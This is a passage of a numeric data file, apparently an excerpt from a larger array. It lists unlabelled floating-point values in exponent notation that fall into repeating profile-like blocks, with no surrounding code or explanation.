0.19700988e-02,
0.17385191e-02,
0.15121014e-02,
0.12910479e-02,
0.10755060e-02,
0.86542196e-03,
0.66050846e-03,
0.46016547e-03,
0.26359106e-03,
0.69742789e-04,
-0.12264148e-03,
-0.31505234e-03,
-0.50968054e-03,
-0.70983008e-03,
-0.92059938e-03,
-0.11514680e-02,
-0.14202188e-02,
-0.17611791e-02,
-0.22402222e-02,
-0.29767312e-02,
-0.41622054e-02,
-0.60354555e-02,
-0.87412195e-02,
-0.12048509e-01,
-0.15178418e-01,
-0.17183300e-01,
-0.17799482e-01,
-0.17704254e-01,
-0.17711623e-01,
-0.18075820e-01,
-0.18659104e-01,
-0.19336520e-01,
-0.20114373e-01,
-0.21086661e-01,
-0.22448380e-01,
-0.24543686e-01,
-0.26968870e-01,
-0.27425798e-01,
-0.25982859e-01,
0.35297391e-02,
0.39938814e-02,
0.45724809e-02,
0.51651788e-02,
0.56997212e-02,
0.61313836e-02,
0.64464915e-02,
0.66571729e-02,
0.67870081e-02,
0.68575540e-02,
0.68832617e-02,
0.68728351e-02,
0.68318904e-02,
0.67646406e-02,
0.66746362e-02,
0.65650316e-02,
0.64386618e-02,
0.62980657e-02,
0.61454801e-02,
0.59827766e-02,
0.58114552e-02,
0.56327097e-02,
0.54474538e-02,
0.52563460e-02,
0.50598914e-02,
0.48585772e-02,
0.46528103e-02,
0.44429065e-02,
0.42291693e-02,
0.40119542e-02,
0.37917392e-02,
0.35690265e-02,
0.33443815e-02,
0.31186463e-02,
0.28926407e-02,
0.26670455e-02,
0.24426919e-02,
0.22205103e-02,
0.20012076e-02,
0.17854705e-02,
0.15739684e-02,
0.13671899e-02,
0.11654871e-02,
0.96899009e-03,
0.77774836e-03,
0.59148681e-03,
0.40965760e-03,
0.23145005e-03,
0.55848002e-04,
-0.11826525e-03,
-0.29229349e-03,
-0.46810537e-03,
-0.64812414e-03,
-0.83613564e-03,
-0.10385482e-02,
-0.12673559e-02,
-0.15453240e-02,
-0.19167364e-02,
-0.24653263e-02,
-0.33373679e-02,
-0.47518569e-02,
-0.69443211e-02,
-0.99710366e-02,
-0.13414696e-01,
-0.16345950e-01,
-0.17911386e-01,
-0.18145934e-01,
-0.17885052e-01,
-0.17836532e-01,
-0.18110715e-01,
-0.18532671e-01,
-0.18993681e-01,
-0.19508589e-01,
-0.20170461e-01,
-0.21185948e-01,
-0.22894341e-01,
-0.24724348e-01,
-0.24370475e-01,
-0.22268195e-01,
0.31942856e-02,
0.36158317e-02,
0.41410751e-02,
0.46785669e-02,
0.51624421e-02,
0.55519687e-02,
0.58347746e-02,
0.60220673e-02,
0.61355513e-02,
0.61951405e-02,
0.62143006e-02,
0.62012500e-02,
0.61613480e-02,
0.60985861e-02,
0.60162526e-02,
0.59171882e-02,
0.58038891e-02,
0.56785326e-02,
0.55429381e-02,
0.53985524e-02,
0.52465028e-02,
0.50876997e-02,
0.49228426e-02,
0.47523943e-02,
0.45767589e-02,
0.43963231e-02,
0.42114421e-02,
0.40224311e-02,
0.38296313e-02,
0.36334537e-02,
0.34343314e-02,
0.32326737e-02,
0.30291770e-02,
0.28245456e-02,
0.26194807e-02,
0.24146992e-02,
0.22109461e-02,
0.20089839e-02,
0.18095284e-02,
0.16132607e-02,
0.14207716e-02,
0.12325735e-02,
0.10491284e-02,
0.87066717e-03,
0.69715641e-03,
0.52842626e-03,
0.36394782e-03,
0.20294097e-03,
0.44450713e-04,
-0.11262445e-03,
-0.26963896e-03,
-0.42814302e-03,
-0.59004046e-03,
-0.75823971e-03,
-0.93725865e-03,
-0.11351963e-02,
-0.13674999e-02,
-0.16641312e-02,
-0.20829688e-02,
-0.27305069e-02,
-0.37841904e-02,
-0.54863039e-02,
-0.80432529e-02,
-0.11373957e-01,
-0.14846842e-01,
-0.17431933e-01,
-0.18471425e-01,
-0.18317387e-01,
-0.17884307e-01,
-0.17721877e-01,
-0.17807389e-01,
-0.17944368e-01,
-0.18038927e-01,
-0.18111341e-01,
-0.18263325e-01,
-0.18744303e-01,
-0.19931488e-01,
-0.21152221e-01,
-0.20258194e-01,
-0.18154927e-01,
0.28755944e-02,
0.32562227e-02,
0.37303183e-02,
0.42150859e-02,
0.46508745e-02,
0.50008302e-02,
0.52538323e-02,
0.54201568e-02,
0.55196281e-02,
0.55704820e-02,
0.55851364e-02,
0.55712480e-02,
0.55338335e-02,
0.54765893e-02,
0.54024858e-02,
0.53140409e-02,
0.52134213e-02,
0.51024402e-02,
0.49825548e-02,
0.48549226e-02,
0.47204504e-02,
0.45797881e-02,
0.44334051e-02,
0.42817341e-02,
0.41251029e-02,
0.39637811e-02,
0.37980722e-02,
0.36283240e-02,
0.34549329e-02,
0.32783179e-02,
0.30987991e-02,
0.29169142e-02,
0.27332988e-02,
0.25485274e-02,
0.23631887e-02,
0.21780862e-02,
0.19938366e-02,
0.18110086e-02,
0.16303621e-02,
0.14525431e-02,
0.12780537e-02,
0.11074701e-02,
0.94128802e-03,
0.77982916e-03,
0.62306761e-03,
0.47078525e-03,
0.32257999e-03,
0.17765176e-03,
0.35159428e-04,
-0.10600228e-03,
-0.24719909e-03,
-0.38967439e-03,
-0.53508411e-03,
-0.68561384e-03,
-0.84459153e-03,
-0.10175847e-02,
-0.12152690e-02,
-0.14582346e-02,
-0.17864328e-02,
-0.22758693e-02,
-0.30617819e-02,
-0.43552169e-02,
-0.64090681e-02,
-0.93599092e-02,
-0.12933343e-01,
-0.16276378e-01,
-0.18346461e-01,
-0.18781584e-01,
-0.18226096e-01,
-0.17576260e-01,
-0.17187940e-01,
-0.16925601e-01,
-0.16586989e-01,
-0.16100395e-01,
-0.15514784e-01,
-0.15000328e-01,
-0.14952605e-01,
-0.15897794e-01,
-0.17156484e-01,
-0.16811144e-01,
-0.16059641e-01,
0.25749404e-02,
0.29165992e-02,
0.33420587e-02,
0.37768418e-02,
0.41672788e-02,
0.44802395e-02,
0.47057904e-02,
0.48532858e-02,
0.49406979e-02,
0.49845842e-02,
0.49962578e-02,
0.49827271e-02,
0.49485951e-02,
0.48972480e-02,
0.48313839e-02,
0.47532097e-02,
0.46645310e-02,
0.45668236e-02,
0.44612922e-02,
0.43488974e-02,
0.42303428e-02,
0.41060960e-02,
0.39765178e-02,
0.38419361e-02,
0.37026398e-02,
0.35588457e-02,
0.34108032e-02,
0.32588942e-02,
0.31035459e-02,
0.29450748e-02,
0.27838917e-02,
0.26205610e-02,
0.24555970e-02,
0.22894754e-02,
0.21228124e-02,
0.19562438e-02,
0.17903824e-02,
0.16257121e-02,
0.14628675e-02,
0.13024764e-02,
0.11450466e-02,
0.99116936e-03,
0.84134901e-03,
0.69589523e-03,
0.55489980e-03,
0.41809730e-03,
0.28507152e-03,
0.15523843e-03,
0.27696389e-04,
-0.98706871e-04,
-0.22511023e-03,
-0.35272306e-03,
-0.48294108e-03,
-0.61748014e-03,
-0.75878931e-03,
-0.91083115e-03,
-0.10810896e-02,
-0.12839842e-02,
-0.15473457e-02,
-0.19251802e-02,
-0.25176301e-02,
-0.34943304e-02,
-0.50974879e-02,
-0.75646825e-02,
-0.10904021e-01,
-0.14594574e-01,
-0.17590806e-01,
-0.18962247e-01,
-0.18717308e-01,
-0.17718159e-01,
-0.16742069e-01,
-0.15938997e-01,
-0.15096456e-01,
-0.14041902e-01,
-0.12778138e-01,
-0.11481387e-01,
-0.10537255e-01,
-0.10632942e-01,
-0.12457354e-01,
-0.15134930e-01,
-0.16634356e-01,
-0.17927606e-01,
0.22929932e-02,
0.25978240e-02,
0.29773721e-02,
0.33650806e-02,
0.37129789e-02,
0.39914814e-02,
0.41917670e-02,
0.43222816e-02,
0.43991888e-02,
0.44373926e-02,
0.44470965e-02,
0.44346289e-02,
0.44041476e-02,
0.43587163e-02,
0.43007480e-02,
0.42321626e-02,
0.41544731e-02,
0.40688911e-02,
0.39764121e-02,
0.38778088e-02,
0.37736101e-02,
0.36642191e-02,
0.35499295e-02,
0.34309430e-02,
0.33074785e-02,
0.31797730e-02,
0.30480758e-02,
0.29127430e-02,
0.27741243e-02,
0.26325521e-02,
0.24885421e-02,
0.23425936e-02,
0.21950973e-02,
0.20465283e-02,
0.18974531e-02,
0.17483715e-02,
0.15998175e-02,
0.14523078e-02,
0.13063080e-02,
0.11623653e-02,
0.10211229e-02,
0.88305573e-03,
0.74868003e-03,
0.61835541e-03,
0.49214705e-03,
0.36987942e-03,
0.25109114e-03,
0.13533220e-03,
0.21703247e-04,
-0.90926857e-04,
-0.20352546e-03,
-0.31733362e-03,
-0.43350609e-03,
-0.55338885e-03,
-0.67877601e-03,
-0.81268302e-03,
-0.96038845e-03,
-0.11320858e-02,
-0.13475646e-02,
-0.16453972e-02,
-0.20989443e-02,
-0.28392603e-02,
-0.40741763e-02,
-0.60647582e-02,
-0.89876316e-02,
-0.12647802e-01,
-0.16243244e-01,
-0.18616004e-01,
-0.19093577e-01,
-0.18077876e-01,
-0.16530357e-01,
-0.15029374e-01,
-0.13550565e-01,
-0.11885053e-01,
-0.99943755e-02,
-0.81011895e-02,
-0.66745249e-02,
-0.64049885e-02,
-0.81325630e-02,
-0.12245839e-01,
-0.17089149e-01,
-0.20167973e-01,
-0.22245478e-01,
0.20299123e-02,
0.23001628e-02,
0.26366366e-02,
0.29802567e-02,
0.32884392e-02,
0.35349382e-02,
0.37119628e-02,
0.38270687e-02,
0.38946737e-02,
0.39280793e-02,
0.39364123e-02,
0.39253496e-02,
0.38986101e-02,
0.38588869e-02,
0.38082711e-02,
0.37484372e-02,
0.36807158e-02,
0.36061385e-02,
0.35254795e-02,
0.34393084e-02,
0.33480865e-02,
0.32521591e-02,
0.31517555e-02,
0.30470104e-02,
0.29380592e-02,
0.28251486e-02,
0.27085962e-02,
0.25886497e-02,
0.24655664e-02,
0.23397931e-02,
0.22118504e-02,
0.20821332e-02,
0.19509925e-02,
0.18189276e-02,
0.16863818e-02,
0.15537632e-02,
0.14214842e-02,
0.12901434e-02,
0.11600459e-02,
0.10316600e-02,
0.90566400e-03,
0.78258343e-03,
0.66282053e-03,
0.54670696e-03,
0.43438902e-03,
0.32569954e-03,
0.22029619e-03,
0.11765160e-03,
0.16918209e-04,
-0.82841863e-04,
-0.18264857e-03,
-0.28356965e-03,
-0.38668749e-03,
-0.49303711e-03,
-0.60395780e-03,
-0.72176283e-03,
-0.85029344e-03,
-0.99679129e-03,
-0.11756377e-02,
-0.14147292e-02,
-0.17678216e-02,
-0.23343621e-02,
-0.32830362e-02,
-0.48576673e-02,
-0.73089227e-02,
-0.10680980e-01,
-0.14495158e-01,
-0.17674342e-01,
-0.19089572e-01,
-0.18462013e-01,
-0.16541397e-01,
-0.14258571e-01,
-0.11979854e-01,
-0.96273897e-02,
-0.71729873e-02,
-0.49013551e-02,
-0.33841925e-02,
-0.33057944e-02,
-0.52674399e-02,
-0.96266540e-02,
-0.15894135e-01,
-0.21601008e-01,
-0.24401912e-01,
-0.25605565e-01,
0.17854190e-02,
0.20233756e-02,
0.23196433e-02,
0.26221615e-02,
0.28933994e-02,
0.31102363e-02,
0.32658295e-02,
0.33668731e-02,
0.34261208e-02,
0.34553525e-02,
0.34626699e-02,
0.34531134e-02,
0.34299616e-02,
0.33955548e-02,
0.33516849e-02,
0.32997937e-02,
0.32410624e-02,
0.31763858e-02,
0.31063606e-02,
0.30314266e-02,
0.29519610e-02,
0.28682463e-02,
0.27804545e-02,
0.26887048e-02,
0.25930938e-02,
0.24938518e-02,
0.23912911e-02,
0.22855958e-02,
0.21769952e-02,
0.20659990e-02,
0.19530528e-02,
0.18384572e-02,
0.17226556e-02,
0.16060474e-02,
0.14889956e-02,
0.13717994e-02,
0.12548816e-02,
0.11386774e-02,
0.10235143e-02,
0.90985751e-03,
0.79824886e-03,
0.68927044e-03,
0.58327196e-03,
0.48052520e-03,
0.38123387e-03,
0.28524606e-03,
0.19232801e-03,
0.10188403e-03,
0.13148935e-04,
-0.74649892e-04,
-0.16256304e-03,
-0.25152223e-03,
-0.34248683e-03,
-0.43625894e-03,
-0.53394295e-03,
-0.63723064e-03,
-0.74901024e-03,
-0.87452604e-03,
-0.10243639e-02,
-0.12190320e-02,
-0.14982653e-02,
-0.19371029e-02,
-0.26686641e-02,
-0.39032472e-02,
-0.59056627e-02,
-0.88597359e-02,
-0.12578117e-01,
-0.16234819e-01,
-0.18552493e-01,
-0.18625131e-01,
-0.16659645e-01,
-0.13658211e-01,
-0.10453119e-01,
-0.73239915e-02,
-0.43831225e-02,
-0.19895632e-02,
-0.75665663e-03,
-0.12641177e-02,
-0.37606840e-02,
-0.81160162e-02,
-0.14009449e-01,
-0.20516826e-01,
-0.25252979e-01,
-0.26749684e-01,
-0.26949666e-01,
0.15589494e-02,
0.17668876e-02,
0.20257886e-02,
0.22901346e-02,
0.25271075e-02,
0.27164973e-02,
0.28523379e-02,
0.29405085e-02,
0.29921937e-02,
0.30177287e-02,
0.30242268e-02,
0.30161096e-02,
0.29962433e-02,
0.29666633e-02,
0.29289203e-02,
0.28842422e-02,
0.28336111e-02,
0.27777818e-02,
0.27172987e-02,
0.26525310e-02,
0.25837307e-02,
0.25110987e-02,
0.24347827e-02,
0.23548861e-02,
0.22715516e-02,
0.21849549e-02,
0.20953005e-02,
0.20027831e-02,
0.19077143e-02,
0.18105077e-02,
0.17114856e-02,
0.16110209e-02,
0.15095366e-02,
0.14073697e-02,
0.13047857e-02,
0.12020444e-02,
0.10995269e-02,
0.99746429e-03,
0.89634967e-03,
0.79651998e-03,
0.69846597e-03,
0.60272694e-03,
0.50964806e-03,
0.41947985e-03,
0.33230876e-03,
0.24821598e-03,
0.16693448e-03,
0.87793873e-04,
0.10210203e-04,
-0.66529035e-04,
-0.14337612e-03,
-0.22124445e-03,
-0.30088221e-03,
-0.38298120e-03,
-0.46846602e-03,
-0.55856747e-03,
-0.65543054e-03,
-0.76301250e-03,
-0.88915287e-03,
-0.10492229e-02,
-0.12729177e-02,
-0.16169698e-02,
-0.21851282e-02,
-0.31512871e-02,
-0.47627124e-02,
-0.72655436e-02,
-0.10682470e-01,
-0.14481976e-01,
-0.17479382e-01,
-0.18369909e-01,
-0.16695704e-01,
-0.13192192e-01,
-0.90477718e-02,
-0.50837407e-02,
-0.17456600e-02,
0.50775765e-03,
0.11405456e-02,
-0.15771549e-03,
-0.32012013e-02,
-0.74220751e-02,
-0.12348277e-01,
-0.17880509e-01,
-0.23407269e-01,
-0.26902754e-01,
-0.27527036e-01,
-0.27351677e-01,
0.13498098e-02,
0.15299571e-02,
0.17542662e-02,
0.19832880e-02,
0.21885794e-02,
0.23526303e-02,
0.24702842e-02,
0.25466559e-02,
0.25914581e-02,
0.26136602e-02,
0.26194309e-02,
0.26126066e-02,
0.25956824e-02,
0.25704356e-02,
0.25382130e-02,
0.25000437e-02,
0.24567009e-02,
0.24088090e-02,
0.23568932e-02,
0.23012925e-02,
0.22421621e-02,
0.21796003e-02,
0.21137316e-02,
0.20446836e-02,
0.19726283e-02,
0.18976876e-02,
0.18199275e-02,
0.17396152e-02,
0.16571450e-02,
0.15727388e-02,
0.14866672e-02,
0.13993700e-02,
0.13112020e-02,
0.12224860e-02,
0.11333575e-02,
0.10441266e-02,
0.95500512e-03,
0.86619117e-03,
0.77818817e-03,
0.69130980e-03,
0.60596765e-03,
0.52263023e-03,
0.44163744e-03,
0.36320378e-03,
0.28736555e-03,
0.21433813e-03,
0.14382407e-03,
0.75184740e-04,
0.79467936e-05,
-0.58581456e-04,
-0.12522114e-03,
-0.19278513e-03,
-0.26187330e-03,
-0.33317646e-03,
-0.40739289e-03,
-0.48542794e-03,
-0.56885718e-03,
-0.66080934e-03,
-0.76709641e-03,
-0.89942804e-03,
-0.10802879e-02,
-0.13528165e-02,
-0.17975677e-02,
-0.25551619e-02,
-0.38419224e-02,
-0.59169503e-02,
-0.89288345e-02,
-0.12605214e-01,
-0.15980633e-01,
-0.17610485e-01,
-0.16458714e-01,
-0.12757922e-01,
-0.78148004e-02,
-0.30447829e-02,
0.58803929e-03,
0.24830827e-02,
0.23169408e-02,
0.21695795e-03,
-0.31757678e-02,
-0.70471163e-02,
-0.10940184e-01,
-0.15055859e-01,
-0.19874115e-01,
-0.24761699e-01,
-0.27603908e-01,
-0.27851652e-01,
-0.27539870e-01,
0.11573090e-02,
0.13118297e-02,
0.15042420e-02,
0.17007013e-02,
0.18768052e-02,
0.20175355e-02,
0.21184757e-02,
0.21840241e-02,
0.22225198e-02,
0.22416625e-02,
0.22467452e-02,
0.22410604e-02,
0.22267597e-02,
0.22053893e-02,
0.21781034e-02,
0.21457481e-02,
0.21089534e-02,
0.20682334e-02,
0.20240291e-02,
0.19766658e-02,
0.19262728e-02,
0.18728701e-02,
0.18165240e-02,
0.17574138e-02,
0.16956952e-02,
0.16314362e-02,
0.15646521e-02,
0.14956590e-02,
0.14248277e-02,
0.13522609e-02,
0.12782239e-02,
0.12031234e-02,
0.11273304e-02,
0.10510463e-02,
0.97442413e-03,
0.89773658e-03,
0.82104641e-03,
0.74460293e-03,
0.66874258e-03,
0.59397513e-03,
0.52050536e-03,
0.44870362e-03,
0.37896109e-03,
0.31140892e-03,
0.24619559e-03,
0.18341106e-03,
0.12278830e-03,
0.63891501e-04,
0.61988922e-05,
-0.50909595e-04,
-0.10814507e-03,
-0.16616660e-03,
-0.22550514e-03,
-0.28680690e-03,
-0.35062019e-03,
-0.41758217e-03,
-0.48887444e-03,
-0.56698389e-03,
-0.65631996e-03,
-0.76583039e-03,
-0.91279822e-03,
-0.11302640e-02,
-0.14807846e-02,
-0.20767434e-02,
-0.31004245e-02,
-0.47965096e-02,
-0.73740366e-02,
-0.10751202e-01,
-0.14214644e-01,
-0.16375747e-01,
-0.15823588e-01,
-0.12226088e-01,
-0.67599509e-02,
-0.13356704e-02,
0.24713113e-02,
0.38747264e-02,
0.28679580e-02,
0.11903104e-03,
-0.33430753e-02,
-0.66695027e-02,
-0.96058799e-02,
-0.12532249e-01,
-0.16198792e-01,
-0.21001449e-01,
-0.25733067e-01,
-0.28118331e-01,
-0.27977712e-01,
-0.27381005e-01,
0.98083925e-03,
0.11118341e-02,
0.12749631e-02,
0.14415317e-02,
0.15908498e-02,
0.17101859e-02,
0.17957988e-02,
0.18514196e-02,
0.18841210e-02,
0.19004331e-02,
0.19048484e-02,
0.19001653e-02,
0.18882133e-02,
0.18703013e-02,
0.18473966e-02,
0.18202132e-02,
0.17892951e-02,
0.17550559e-02,
0.17178158e-02,
0.16778519e-02,
0.16353233e-02,
0.15902224e-02,
0.15425772e-02,
0.14925570e-02,
0.14402777e-02,
0.13857534e-02,
0.13290886e-02,
0.12705566e-02,
0.12104037e-02,
0.11487597e-02,
0.10858473e-02,
0.10220249e-02,
0.95764559e-03,
0.89280307e-03,
0.82777342e-03,
0.76263881e-03,
0.69743692e-03,
0.63244364e-03,
0.56787435e-03,
0.50428713e-03,
0.44183279e-03,
0.38074178e-03,
0.32141685e-03,
0.26393912e-03,
0.20854473e-03,
0.15521001e-03,
0.10369664e-03,
0.53771990e-04,
0.48405859e-05,
-0.43625452e-04,
-0.92199283e-04,
-0.14142317e-03,
-0.19180843e-03,
-0.24387297e-03,
-0.29810442e-03,
-0.35491036e-03,
-0.41522519e-03,
-0.48093690e-03,
-0.55558363e-03,
-0.64595538e-03,
-0.76544558e-03,
-0.93956996e-03,
-0.12170107e-02,
-0.16869402e-02,
-0.24994221e-02,
-0.38717622e-02,
-0.60297726e-02,
-0.90123136e-02,
-0.12333807e-01,
-0.14771741e-01,
-0.14760138e-01,
-0.11492035e-01,
-0.58502830e-02,
-0.39222432e-04,
0.38003121e-02,
0.46805777e-02,
0.29477894e-02,
-0.19698367e-03,
-0.34707133e-02,
-0.61565377e-02,
-0.82763545e-02,
-0.10341127e-01,
-0.13046334e-01,
-0.17025929e-01,
-0.22158746e-01,
-0.26648698e-01,
-0.28339002e-01,
-0.27549669e-01,
-0.26395839e-01,
0.81985246e-03,
0.92936639e-03,
0.10657535e-02,
0.12050235e-02,
0.13298774e-02,
0.14296711e-02,
0.15012774e-02,
0.15478174e-02,
0.15752059e-02,
0.15889057e-02,
0.15926794e-02,
0.15888754e-02,
0.15790189e-02,
0.15641790e-02,
0.15451561e-02,
0.15225782e-02,
0.14969195e-02,
0.14685052e-02,
0.14375511e-02,
0.14042476e-02,
0.13687719e-02,
0.13311717e-02,
0.12914606e-02,
0.12497153e-02,
0.12060066e-02,
0.11603512e-02,
0.11129703e-02,
0.10640363e-02,
0.10136392e-02,
0.96200767e-03,
0.90932270e-03,
0.85588358e-03,
0.80193224e-03,
0.74761838e-03,
0.69321913e-03,
0.63866674e-03,
0.58403739e-03,
0.52954548e-03,
0.47544795e-03,
0.42208337e-03,
0.36977371e-03,
0.31858659e-03,
0.26881197e-03,
0.22063967e-03,
0.17424425e-03,
0.12957763e-03,
0.86436587e-04,
0.44699889e-04,
0.37974135e-05,
-0.36786892e-04,
-0.77447279e-04,
-0.11859972e-03,
-0.16077398e-03,
-0.20438076e-03,
-0.24981576e-03,
-0.29733716e-03,
-0.34771886e-03,
-0.40232454e-03,
-0.46408881e-03,
-0.53816853e-03,
-0.63491607e-03,
-0.77419216e-03,
-0.99393132e-03,
-0.13644308e-02,
-0.20072565e-02,
-0.31077981e-02,
-0.48824749e-02,
-0.74348073e-02,
-0.10457132e-01,
-0.12935034e-01,
-0.13322859e-01,
-0.10510216e-01,
-0.50372370e-02,
0.82519592e-03,
0.45412472e-02,
0.49564531e-02,
0.27259453e-02,
-0.53395459e-03,
-0.34414190e-02,
-0.54976437e-02,
-0.69722342e-02,
-0.84393835e-02,
-0.10464143e-01,
-0.13568074e-01,
-0.18088147e-01,
-0.23360549e-01,
-0.27191006e-01,
-0.27798105e-01,
-0.26014257e-01,
-0.23941122e-01,
0.67388569e-03,
0.76391455e-03,
0.87603967e-03,
0.99053816e-03,
0.10931880e-02,
0.11752385e-02,
0.12341201e-02,
0.12724005e-02,
0.12949465e-02,
0.13062552e-02,
0.13094257e-02,
0.13063867e-02,
0.12983767e-02,
0.12862559e-02,
0.12706857e-02,
0.12522101e-02,
0.12312382e-02,
0.12080271e-02,
0.11827156e-02,
0.11554065e-02,
0.11262480e-02,
0.10953922e-02,
0.10628636e-02,
0.10286153e-02,
0.99264085e-03,
0.95504802e-03,
0.91611175e-03,
0.87590015e-03,
0.83438883e-03,
0.79185999e-03,
0.74851344e-03,
0.70453959e-03,
0.66006870e-03,
0.61538786e-03,
0.57062833e-03,
0.52572385e-03,
0.48075779e-03,
0.43583699e-03,
0.39130700e-03,
0.34728937e-03,
0.30423937e-03,
0.26211512e-03,
0.22102211e-03,
0.18136523e-03,
0.14320243e-03,
0.10641267e-03,
0.70891205e-04,
0.36568774e-04,
0.29850753e-05,
-0.30428575e-04,
-0.63911211e-04,
-0.97726115e-04,
-0.13241505e-03,
-0.16834371e-03,
-0.20574214e-03,
-0.24483376e-03,
-0.28623073e-03,
-0.33093616e-03,
-0.38131754e-03,
-0.44136596e-03,
-0.51900127e-03,
-0.62973931e-03,
-0.80306787e-03,
-0.10939565e-02,
-0.15995824e-02,
-0.24733264e-02,
-0.39081872e-02,
-0.60330946e-02,
-0.86653326e-02,
-0.10997782e-01,
-0.11619342e-01,
-0.93000261e-02,
-0.42796796e-02,
0.12966705e-02,
0.47367909e-02,
0.48012077e-02,
0.23494719e-02,
-0.77558518e-03,
-0.32301398e-02,
-0.47397721e-02,
-0.57379329e-02,
-0.67931442e-02,
-0.83390176e-02,
-0.10730988e-01,
-0.14351542e-01,
-0.19255424e-01,
-0.24215246e-01,
-0.26824960e-01,
-0.25858946e-01,
-0.22609137e-01,
-0.19117815e-01,
0.54258847e-03,
0.61508559e-03,
0.70537691e-03,
0.79757918e-03,
0.88023918e-03,
0.94631047e-03,
0.99372561e-03,
0.10245563e-02,
0.10427287e-02,
0.10518713e-02,
0.10544811e-02,
0.10520979e-02,
0.10457006e-02,
0.10359808e-02,
0.10234818e-02,
0.10086508e-02,
0.99183375e-03,
0.97323948e-03,
0.95295400e-03,
0.93100907e-03,
0.90750493e-03,
0.88267523e-03,
0.85658359e-03,
0.82906929e-03,
0.80003683e-03,
0.76972524e-03,
0.73839410e-03,
0.70602290e-03,
0.67255105e-03,
0.63823280e-03,
0.60333178e-03,
0.56789321e-03,
0.53199811e-03,
0.49601536e-03,
0.45993822e-03,
0.42375299e-03,
0.38750842e-03,
0.35126708e-03,
0.31534981e-03,
0.27984436e-03,
0.24513889e-03,
0.21121174e-03,
0.17798673e-03,
0.14601613e-03,
0.11531570e-03,
0.85622109e-04,
0.56977922e-04,
0.29328881e-04,
0.23219493e-05,
-0.24609051e-04,
-0.51613693e-04,
-0.78829580e-04,
-0.10677023e-03,
-0.13576847e-03,
-0.16589028e-03,
-0.19740456e-03,
-0.23071076e-03,
-0.26662330e-03,
-0.30694614e-03,
-0.35483547e-03,
-0.41624482e-03,
-0.50326047e-03,
-0.63863368e-03,
-0.86484943e-03,
-0.12584554e-02,
-0.19429043e-02,
-0.30815345e-02,
-0.48037078e-02,
-0.70073316e-02,
-0.90698786e-02,
-0.97764749e-02,
-0.79293735e-02,
-0.35561759e-02,
0.14528841e-02,
0.44905520e-02,
0.43353909e-02,
0.19235054e-02,
-0.88058808e-03,
-0.28684181e-02,
-0.39436910e-02,
-0.46082577e-02,
-0.53751953e-02,
-0.65655066e-02,
-0.84049981e-02,
-0.11191580e-01,
-0.15233751e-01,
-0.20167785e-01,
-0.24146404e-01,
-0.24793619e-01,
-0.21611178e-01,
-0.16357245e-01,
-0.11137053e-01,
0.42571200e-03,
0.48259774e-03,
0.55344484e-03,
0.62578957e-03,
0.69064385e-03,
0.74247847e-03,
0.77967369e-03,
0.80386118e-03,
0.81812969e-03,
0.82533201e-03,
0.82742231e-03,
0.82559290e-03,
0.82059979e-03,
0.81299205e-03,
0.80320571e-03,
0.79159206e-03,
0.77843288e-03,
0.76390296e-03,
0.74805156e-03,
0.73085778e-03,
0.71239163e-03,
0.69290656e-03,
0.67251193e-03,
0.65096776e-03,
0.62812673e-03,
0.60432340e-03,
0.57976606e-03,
0.55436889e-03,
0.52808766e-03,
0.50110236e-03,
0.47373594e-03,
0.44590727e-03,
0.41769189e-03,
0.38944930e-03,
0.36113514e-03,
0.33273242e-03,
0.30424978e-03,
0.27580233e-03,
0.24755922e-03,
0.21969499e-03,
0.19240828e-03,
0.16580452e-03,
0.13966703e-03,
0.11454133e-03,
0.90488385e-04,
0.67134846e-04,
0.44648674e-04,
0.22957218e-04,
0.17676108e-05,
-0.19375148e-04,
-0.40583618e-04,
-0.61928760e-04,
-0.83859930e-04,
-0.10665116e-03,
-0.13027368e-03,
-0.15504849e-03,
-0.18114736e-03,
-0.20928915e-03,
-0.24077985e-03,
-0.27812496e-03,
-0.32568991e-03,
-0.39278640e-03,
-0.49672712e-03,
-0.66978729e-03,
-0.97107701e-03,
-0.14971532e-02,
-0.23801890e-02,
-0.37356641e-02,
-0.55097779e-02,
-0.72345133e-02,
-0.79152975e-02,
-0.64894208e-02,
-0.28653429e-02,
0.13867198e-02,
0.39382749e-02,
0.36805528e-02,
0.15104047e-02,
-0.85980649e-03,
-0.24118538e-02,
-0.31621221e-02,
-0.36013129e-02,
-0.41603735e-02,
-0.50707515e-02,
-0.64725522e-02,
-0.85721835e-02,
-0.11695998e-01,
-0.15934667e-01,
-0.20252047e-01,
-0.22257976e-01,
-0.20039089e-01,
-0.14158701e-01,
-0.70773158e-02,
-0.11583769e-02,
0.32308648e-03,
0.36626059e-03,
0.42002957e-03,
0.47493313e-03,
0.52414869e-03,
0.56347938e-03,
0.59169793e-03,
0.61004912e-03,
0.62088534e-03,
0.62637340e-03,
0.62798650e-03,
0.62661694e-03,
0.62283722e-03,
0.61707193e-03,
0.60965854e-03,
0.60086075e-03,
0.59088779e-03,
0.57988992e-03,
0.56789967e-03,
0.55486214e-03,
0.54083182e-03,
0.52603544e-03,
0.51060918e-03,
0.49428100e-03,
0.47690922e-03,
0.45883877e-03,
0.44021819e-03,
0.42093766e-03,
0.40098530e-03,
0.38046407e-03,
0.35971330e-03,
0.33858226e-03,
0.31714686e-03,
0.29569783e-03,
0.27421847e-03,
0.25265093e-03,
0.23099354e-03,
0.20943003e-03,
0.18794239e-03,
0.16680970e-03,
0.14604363e-03,
0.12587215e-03,
0.10602640e-03,
0.86910019e-04,
0.68677633e-04,
0.50912015e-04,
0.33862842e-04,
0.17410162e-04,
0.13113118e-05,
-0.14745443e-04,
-0.30839601e-04,
-0.47037924e-04,
-0.63687643e-04,
-0.81004437e-04,
-0.98914243e-04,
-0.11776508e-03,
-0.13753906e-03,
-0.15888251e-03,
-0.18270283e-03,
-0.21094215e-03,
-0.24672056e-03,
-0.29703090e-03,
-0.37476781e-03,
-0.50383923e-03,
-0.72860206e-03,
-0.11220841e-02,
-0.17865424e-02,
-0.28166992e-02,
-0.41856705e-02,
-0.55507738e-02,
-0.61370027e-02,
-0.50718379e-02,
-0.22190376e-02,
0.11870584e-02,
0.32180531e-02,
0.29439172e-02,
0.11399792e-02,
-0.75004215e-03,
-0.19179990e-02,
-0.24332437e-02,
-0.27225760e-02,
-0.31262944e-02,
-0.38075345e-02,
-0.48529524e-02,
-0.64000175e-02,
-0.87149860e-02,
-0.12041125e-01,
-0.15928924e-01,
-0.18521670e-01,
-0.17406538e-01,
-0.11980806e-01,
-0.43471926e-02,
0.24430454e-02,
0.64657470e-02,
0.23461202e-03,
0.26596323e-03,
0.30500707e-03,
0.34487346e-03,
0.38060735e-03,
0.40916057e-03,
0.42964329e-03,
0.44296391e-03,
0.45083603e-03,
0.45483361e-03,
0.45601939e-03,
0.45503493e-03,
0.45229631e-03,
0.44811305e-03,
0.44273314e-03,
0.43635038e-03,
0.42911444e-03,
